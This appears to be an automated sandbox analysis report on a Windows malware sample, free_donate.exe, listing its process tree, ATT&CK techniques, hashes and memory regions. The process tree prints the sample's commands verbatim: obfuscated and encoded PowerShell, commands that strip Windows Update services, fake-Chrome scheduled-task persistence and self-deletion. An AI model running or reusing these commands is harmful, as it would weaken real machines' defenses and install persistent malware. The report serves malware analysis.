PID:1600

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
6⤵
PID:1928

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
6⤵
PID:1680

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
6⤵
PID:1152

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
6⤵
PID:1276

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
6⤵
PID:1508

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
5⤵
PID:1684

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:604

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1632

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
6⤵
PID:1772

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
6⤵
PID:1884

C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe "fotenqffsdg"
5⤵
PID:1404

C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe yggqxvaxzgtmmnu0 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPpZDYkQjcS/S/TS19hCmaZeuUnLsXDD9UtB3flETOPTJSsx1RTbkWA+xUUHWbk5tS/88kiBjzOWROcItZCa19YzWwG294PvSGFl3hPGA5ZbwU+pcVLBqbqLOnV4zWU4lY2wH0ZELAHdkWrYk+7ENXoQziO22V6ckhOxPyaVs82YN/9a3ifTAItYOFArt4U3K6bB7F90lVvq7QwQhNo6tEAC6/qeiMZE1q08X0nwcXGWB+0u4suIL4Z4DCAa054zZutth0rng4GR/dXCbKfw/lYkNtdAcXMzX35twOSggH5Co4UwheW366ng+FuqhYrupWviHg3nrTWKYKFV/Z9VkRc5QPFZo8S1u8KUaN/9+FCfaV9FnY0PiGQClhwUH1x4ZHMgCHvbtTfAQZnZ6PHdhTedfzPc/1b6jDZTt2gLFGVUTpdjtbd0A7HbKxciS2G9ds3BAn0dJexxAf2Br8df8B/KEwKMJ+loEE6uuE26u2HGWPzuqaI7RLAlHRh9CoJI1+I=
5⤵
PID:1664

C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe yggqxvaxzgtmmnu1 XofLACsdV31j9ZQMDeZoqCpNDgH0IbRDCo8NYw9+P4ISyhmBaEKZj/pCrFzqeglJuGJVePitxQ1seLOAXl7jWWqXK+zOrqa2LmfHXb1cPkhd1J50U99RQ61Gyog4XK27/XTKo0f9OmcXDDPP9C48Ue7GZsz87KETDZ5qD/Yaq1lB35GEx/fRQAGrjdVEa0u7JPhfVtNRFtP1XBlwVUEgxsufEEfeQMI5wTmbbTssPqyRBa9iiWu+72oSNhkbSwWZcuQ2UAgyeaUjxbtJ0D2znd9Y++tdpAWuo5aLo0IzHXZhNVbYmhUQJYD+wnHENe+14/exahTwHPq/jdb503ZCEWJvf3Rvhi52ecxgli8y+ICndzv7ONBqBKvBj1Mu1X47SAlkpCck5/xJqFvaPG5cIq3h/y80diKSbPokVDWnEa/rMyTVTPRzyu+sagweTAfH7BqvN6UeRhHhphz3iAeobA==
5⤵
PID:1516

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
4⤵
PID:1984

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
2⤵
PID:1044

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
2⤵
PID:1100

C:\Windows\system32\sppsvc.exe
C:\Windows\system32\sppsvc.exe
2⤵
PID:1124

C:\Windows\system32\taskhost.exe
"taskhost.exe"
2⤵
PID:1228

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
2⤵
PID:456

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService
2⤵
PID:340

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService
2⤵
PID:852

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
2⤵
PID:816

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS
2⤵
PID:676

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
2⤵
PID:596

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
3⤵
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:360

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:420

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{7d67f2bd-91f9-4288-8ea5-bb05941b230e}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1732

C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
1⤵
PID:488

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:1360

C:\Users\Admin\AppData\Local\Temp\free_donate.exe
"C:\Users\Admin\AppData\Local\Temp\free_donate.exe"
2⤵
- Drops file in Drivers directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1456

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAZgBxACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdwBhAG0AIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegB5AGQAaQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBpAHUAbAAjAD4A"
3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:948

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
3⤵
- Suspicious use of WriteProcessMemory
PID:668

C:\Windows\system32\sc.exe
sc stop UsoSvc
4⤵
- Launches sc.exe
PID:1996

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
4⤵
- Launches sc.exe
PID:1224

C:\Windows\system32\sc.exe
sc stop wuauserv
4⤵
- Launches sc.exe
PID:1552

C:\Windows\system32\sc.exe
sc stop bits
4⤵
- Launches sc.exe
PID:868

C:\Windows\system32\sc.exe
sc stop dosvc
4⤵
- Launches sc.exe
PID:1964

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
4⤵
- Modifies registry key
PID:288

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
4⤵
- Modifies registry key
PID:1748

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
4⤵
- Modifies security service
- Modifies registry key
PID:1772

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
4⤵
- Modifies registry key
PID:840

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
4⤵
- Modifies registry key
PID:604

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:960

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:788

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:1672

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:276

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:544

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:692

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
4⤵
PID:976

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
4⤵
PID:1304

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
4⤵
PID:688

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
4⤵
PID:1592

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
4⤵
PID:2012

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
4⤵
PID:1632

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
4⤵
PID:1704

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of WriteProcessMemory
PID:1760

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1216

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1536

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1584

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1956

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
3⤵
- Drops file in Windows directory
PID:1576

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""
3⤵
PID:1332

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""
4⤵
- Creates scheduled task(s)
PID:1180

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
3⤵
PID:1828

C:\Windows\system32\schtasks.exe
schtasks /run /tn "GoogleUpdateTaskMachineQC"
4⤵
PID:1884

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\free_donate.exe"
3⤵
- Deletes itself
PID:868

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
4⤵
PID:1280

C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
1⤵
PID:1308

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-14552349396535947071954837125-10310760461702763116-119689237451995075-107266321"
1⤵
PID:1332

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1161071751280528012-20849244261502240785173470779-455931799-1815115364-1413634865"
1⤵
PID:276

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1803288125359424456-620896677-1149549188-826256409-15596204601315861380-1934347682"
1⤵
- Suspicious use of SetWindowsHookEx
PID:1604

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Impair Defenses

T1562

File Permissions Modification

T1222

Install Root Certificate

T1130

Credential Access

Discovery

System Information Discovery

T1082

Query Registry

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\updater.exe
Filesize
2.7MB

MD5
5026ed09cc5a093093461066d16a8f30

SHA1
34d60b874d9d3f8841c721692ea1daf31f330653

SHA256
b495d68b0733d071e67e0c30665382decd71885af9bad1c6510ef168e5732cd3

SHA512
2429b9d55af9abe991a182b5fe49548d31986046c3bbacaa4021dd7544752f9b2e0b5c494c989b58daafaaf604e863abe3bd013125068331538618140d67a1f1

Download Submit
C:\Program Files\Google\Chrome\updater.exe
Filesize
2.7MB

MD5
5026ed09cc5a093093461066d16a8f30

SHA1
34d60b874d9d3f8841c721692ea1daf31f330653

SHA256
b495d68b0733d071e67e0c30665382decd71885af9bad1c6510ef168e5732cd3

SHA512
2429b9d55af9abe991a182b5fe49548d31986046c3bbacaa4021dd7544752f9b2e0b5c494c989b58daafaaf604e863abe3bd013125068331538618140d67a1f1

Download Submit
C:\Windows\system32\drivers\etc\hosts
Filesize
860B

MD5
63b960c8d33c756293dfca7f8a2c50f3

SHA1
958b4e2fc745072879c19de73620b84a8500a190

SHA256
2f513fa3cf9778985ed1f58d33cc575723825ec57ed91dae1e9aa340b2721969

SHA512
799747ff0038f8b2d87bead690b2101ca7fa92f84186ece14c0f1d362ece9d89ca7898e390136eb888cc4f052ad21e5c9a78d67d27b76e13740f964d4eebe536

Download Submit
\Program Files\Google\Chrome\updater.exe
Filesize
2.7MB

MD5
5026ed09cc5a093093461066d16a8f30

SHA1
34d60b874d9d3f8841c721692ea1daf31f330653

SHA256
b495d68b0733d071e67e0c30665382decd71885af9bad1c6510ef168e5732cd3

SHA512
2429b9d55af9abe991a182b5fe49548d31986046c3bbacaa4021dd7544752f9b2e0b5c494c989b58daafaaf604e863abe3bd013125068331538618140d67a1f1

Download Submit
memory/276-333-0x0000000036DD0000-0x0000000036DE0000-memory.dmp

Filesize
64KB

Download
memory/276-85-0x0000000000000000-mapping.dmp

Download
memory/276-331-0x0000000000200000-0x000000000022A000-memory.dmp

Filesize
168KB

Download
memory/288-76-0x0000000000000000-mapping.dmp

Download
memory/340-235-0x0000000000920000-0x000000000094A000-memory.dmp

Filesize
168KB

Download
memory/360-347-0x00000000002F0000-0x000000000031A000-memory.dmp

Filesize
168KB

Download
memory/360-348-0x0000000036DD0000-0x0000000036DE0000-memory.dmp

Filesize
64KB

Download
memory/360-328-0x0000000000000000-mapping.dmp

Download
memory/420-161-0x0000000000880000-0x00000000008AA000-memory.dmp

Filesize
168KB

Download
memory/420-155-0x00000000007C0000-0x00000000007E3000-memory.dmp

Filesize
140KB

Download
memory/420-149-0x0000000036DD0000-0x0000000036DE0000-memory.dmp

Filesize
64KB

Download
memory/420-146-0x000007FEBE4D0000-0x000007FEBE4E0000-memory.dmp

Filesize
64KB

Download
memory/420-143-0x00000000007C0000-0x00000000007E3000-memory.dmp

Filesize
140KB

Download
memory/456-236-0x0000000001C60000-0x0000000001C8A000-memory.dmp

Filesize
168KB

Download
memory/456-238-0x0000000036DD0000-0x0000000036DE0000-memory.dmp

Filesize
64KB

Download
memory/464-162-0x00000000002D0000-0x00000000002FA000-memory.dmp

Filesize
168KB

Download
memory/464-154-0x0000000036DD0000-0x0000000036DE0000-memory.dmp

Filesize
64KB

Download
memory/464-150-0x000007FEBE4D0000-0x000007FEBE4E0000-memory.dmp

Filesize
64KB

Download
memory/480-163-0x00000000000D0000-0x00000000000FA000-memory.dmp

Filesize
168KB

Download
memory/480-157-0x000007FEBE4D0000-0x000007FEBE4E0000-memory.dmp

Filesize
64KB

Download
memory/480-159-0x0000000036DD0000-0x0000000036DE0000-memory.dmp

Filesize
64KB

Download
memory/488-217-0x0000000000510000-0x000000000053A000-memory.dmp

Filesize
168KB

Download
memory/488-165-0x000007FEBE4D0000-0x000007FEBE4E0000-memory.dmp

Filesize
64KB

Download
memory/488-167-0x0000000036DD0000-0x0000000036DE0000-memory.dmp

Filesize
64KB

Download
memory/544-86-0x0000000000000000-mapping.dmp

Download
memory/596-220-0x0000000000420000-0x000000000044A000-memory.dmp

Filesize
168KB

Download
memory/596-170-0x000007FEBE4D0000-0x000007FEBE4E0000-memory.dmp

Filesize
64KB

Download
memory/596-172-0x0000000036DD0000-0x0000000036DE0000-memory.dmp

Filesize
64KB

Download
memory/604-307-0x00000000001D0000-0x00000000001FA000-memory.dmp

Filesize
168KB

Download
memory/604-81-0x0000000000000000-mapping.dmp

Download
memory/604-303-0x0000000000000000-mapping.dmp

Download
memory/668-66-0x0000000000000000-mapping.dmp

Download
memory/676-223-0x00000000005D0000-0x00000000005FA000-memory.dmp

Filesize
168KB

Download
memory/676-173-0x000007FEBE4D0000-0x000007FEBE4E0000-memory.dmp

Filesize
64KB

Download
memory/676-174-0x0000000036DD0000-0x0000000036DE0000-memory.dmp

Filesize
64KB

Download
memory/688-90-0x0000000000000000-mapping.dmp

Download
memory/688-369-0x0000000000000000-mapping.dmp

Download
memory/692-87-0x0000000000000000-mapping.dmp

Download
memory/748-177-0x000007FEBE4D0000-0x000007FEBE4E0000-memory.dmp

Filesize
64KB

Download
memory/748-227-0x0000000000840000-0x000000000086A000-memory.dmp

Filesize
168KB

Download
memory/748-179-0x0000000036DD0000-0x0000000036DE0000-memory.dmp

Filesize
64KB

Download
memory/788-83-0x0000000000000000-mapping.dmp

Download
memory/808-304-0x0000000000110000-0x000000000013A000-memory.dmp

Filesize
168KB

Download
memory/808-298-0x0000000000000000-mapping.dmp

Download
memory/816-181-0x000007FEBE4D0000-0x000007FEBE4E0000-memory.dmp

Filesize
64KB

Download
memory/816-229-0x00000000009E0000-0x0000000000A0A000-memory.dmp

Filesize
168KB

Download
memory/816-183-0x0000000036DD0000-0x0000000036DE0000-memory.dmp

Filesize
64KB

Download
memory/840-80-0x0000000000000000-mapping.dmp

Download
memory/852-231-0x0000000000910000-0x000000000093A000-memory.dmp

Filesize
168KB

Download
memory/864-384-0x0000000000000000-mapping.dmp

Download
memory/868-115-0x0000000000000000-mapping.dmp

Download
memory/868-73-0x0000000000000000-mapping.dmp

Download
memory/876-233-0x0000000000840000-0x000000000086A000-memory.dmp

Filesize
168KB

Download
memory/900-392-0x0000000000000000-mapping.dmp

Download
memory/948-65-0x000000000281B000-0x000000000283A000-memory.dmp

Filesize
124KB

Download
memory/948-64-0x0000000002814000-0x0000000002817000-memory.dmp

Filesize
12KB

Download
memory/948-62-0x000007FEEC770000-0x000007FEED2CD000-memory.dmp

Filesize
11.4MB

Download
memory/948-63-0x0000000002814000-0x0000000002817000-memory.dmp

Filesize
12KB

Download
memory/948-61-0x000007FEED2D0000-0x000007FEEDCF3000-memory.dmp

Filesize
10.1MB

Download
memory/948-59-0x0000000000000000-mapping.dmp

Download
memory/960-82-0x0000000000000000-mapping.dmp

Download
memory/976-88-0x0000000000000000-mapping.dmp

Download
memory/1020-375-0x0000000000000000-mapping.dmp

Download
memory/1044-239-0x00000000001C0000-0x00000000001EA000-memory.dmp

Filesize
168KB

Download
memory/1076-359-0x0000000000000000-mapping.dmp

Download
memory/1076-362-0x0000000000090000-0x00000000000BA000-memory.dmp

Filesize
168KB

Download
memory/1076-410-0x0000000000000000-mapping.dmp

Download
memory/1100-245-0x00000000007A0000-0x00000000007CA000-memory.dmp

Filesize
168KB

Download
memory/1100-246-0x0000000036DD0000-0x0000000036DE0000-memory.dmp

Filesize
64KB

Download
memory/1112-386-0x0000000000000000-mapping.dmp

Download
memory/1124-247-0x00000000009E0000-0x0000000000A0A000-memory.dmp

Filesize
168KB

Download
memory/1180-116-0x0000000000000000-mapping.dmp

Download
memory/1216-69-0x0000000000000000-mapping.dmp

Download
memory/1224-70-0x0000000000000000-mapping.dmp

Download
memory/1228-240-0x0000000001EA0000-0x0000000001ECA000-memory.dmp

Filesize
168KB

Download
memory/1260-385-0x0000000000000000-mapping.dmp

Download
memory/1280-445-0x0000000000000000-mapping.dmp

Download
memory/1280-118-0x0000000000000000-mapping.dmp

Download
memory/1304-89-0x0000000000000000-mapping.dmp

Download
memory/1308-242-0x0000000036DD0000-0x0000000036DE0000-memory.dmp

Filesize
64KB

Download
memory/1308-241-0x0000000001B10000-0x0000000001B3A000-memory.dmp

Filesize
168KB

Download
memory/1332-113-0x0000000000000000-mapping.dmp

Download
memory/1332-267-0x0000000000B10000-0x0000000000B3A000-memory.dmp

Filesize
168KB

Download
memory/1332-268-0x0000000036DD0000-0x0000000036DE0000-memory.dmp

Filesize
64KB

Download
memory/1360-243-0x0000000002960000-0x000000000298A000-memory.dmp

Filesize
168KB

Download
memory/1360-244-0x0000000036DD0000-0x0000000036DE0000-memory.dmp

Filesize
64KB

Download
memory/1404-387-0x0000000000000000-mapping.dmp

Download
memory/1456-95-0x0000000002410000-0x0000000002416000-memory.dmp

Filesize
24KB

Download
memory/1456-54-0x000000013FB60000-0x000000013FE18000-memory.dmp

Filesize
2.7MB

Download
memory/1456-58-0x000007FEFB5E1000-0x000007FEFB5E3000-memory.dmp

Filesize
8KB

Download
memory/1456-57-0x0000000000650000-0x0000000000656000-memory.dmp

Filesize
24KB

Download
memory/1456-56-0x000000001C100000-0x000000001C3A4000-memory.dmp

Filesize
2.6MB

Download
memory/1456-55-0x0000000000640000-0x0000000000646000-memory.dmp

Filesize
24KB

Download
memory/1464-419-0x0000000000000000-mapping.dmp

Download
memory/1536-72-0x0000000000000000-mapping.dmp

Download
memory/1552-71-0x0000000000000000-mapping.dmp

Download
memory/1556-404-0x0000000000000000-mapping.dmp

Download
memory/1576-97-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/1576-103-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/1576-112-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/1576-110-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/1576-96-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/1576-102-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/1576-101-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/1576-99-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/1576-108-0x0000000140001844-mapping.dmp

Download
memory/1576-107-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/1576-106-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/1576-104-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/1584-75-0x0000000000000000-mapping.dmp

Download
memory/1592-91-0x0000000000000000-mapping.dmp

Download
memory/1600-270-0x0000000000980000-0x00000000009AA000-memory.dmp

Filesize
168KB

Download
memory/1600-249-0x0000000000000000-mapping.dmp

Download
memory/1600-269-0x0000000000DF0000-0x0000000000E70000-memory.dmp

Filesize
512KB

Download
memory/1604-330-0x00000000006E0000-0x000000000070A000-memory.dmp

Filesize
168KB

Download
memory/1604-332-0x0000000036DD0000-0x0000000036DE0000-memory.dmp

Filesize
64KB

Download
memory/1632-349-0x0000000000140000-0x000000000016A000-memory.dmp

Filesize
168KB

Download
memory/1632-342-0x00000000001D0000-0x00000000001FA000-memory.dmp

Filesize
168KB

Download
memory/1632-313-0x0000000000000000-mapping.dmp

Download
memory/1632-93-0x0000000000000000-mapping.dmp

Download
memory/1672-84-0x0000000000000000-mapping.dmp

Download
memory/1684-336-0x0000000000490000-0x00000000004BA000-memory.dmp

Filesize
168KB

Download
memory/1684-345-0x0000000000250000-0x000000000027A000-memory.dmp

Filesize
168KB

Download
memory/1684-292-0x0000000000000000-mapping.dmp

Download
memory/1704-94-0x0000000000000000-mapping.dmp

Download
memory/1732-131-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/1732-160-0x0000000076D90000-0x0000000076F39000-memory.dmp

Filesize
1.7MB

Download
memory/1732-138-0x0000000076D90000-0x0000000076F39000-memory.dmp

Filesize
1.7MB

Download
memory/1732-140-0x0000000076B70000-0x0000000076C8F000-memory.dmp

Filesize
1.1MB

Download
memory/1732-135-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/1732-153-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/1732-132-0x00000001400033F4-mapping.dmp

Download
memory/1732-248-0x00000000004E0000-0x000000000050A000-memory.dmp

Filesize
168KB

Download
memory/1736-266-0x0000000000EF0000-0x0000000000F1A000-memory.dmp

Filesize
168KB

Download
memory/1736-125-0x000000013F2D0000-0x000000013F588000-memory.dmp

Filesize
2.7MB

Download
memory/1736-121-0x0000000000000000-mapping.dmp

Download
memory/1748-77-0x0000000000000000-mapping.dmp

Download
memory/1760-67-0x0000000000000000-mapping.dmp

Download
memory/1768-310-0x0000000000000000-mapping.dmp

Download
memory/1772-79-0x0000000000000000-mapping.dmp

Download
memory/1772-352-0x0000000000000000-mapping.dmp

Download
memory/1828-114-0x0000000000000000-mapping.dmp

Download
memory/1884-366-0x0000000000000000-mapping.dmp

Download
memory/1884-117-0x0000000000000000-mapping.dmp

Download
